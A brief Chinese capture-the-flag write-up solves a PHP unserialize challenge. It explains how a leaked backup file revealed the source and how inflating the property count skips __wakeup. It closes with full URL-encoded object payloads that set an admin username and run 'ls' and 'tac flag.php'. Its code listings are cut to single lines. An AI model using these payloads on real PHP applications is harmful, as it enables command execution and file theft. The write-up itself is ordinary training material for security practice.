查看源代码,发现一个base64,解码后发现backups,没看懂是什么意思
扫目录发现备份文件才明白那个backup大概是提示的这个
文件打开后是php源码:
1 | header("Content-Type: text/html;charset=utf-8"); |
反序化题,没有过滤tac和ls
payload(因为这道题涉及protected,所以反序化后会有空字符,必须用url编码):
1 | <?php |
还需要绕过wakeup(不然就会变成guest),当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行,所以还需要把2改成3。
最终payload:
ls:?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A2%3A%22ls%22%3B%7D
tac flag.php:?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A12%3A%22tac+flag.php%22%3B%7D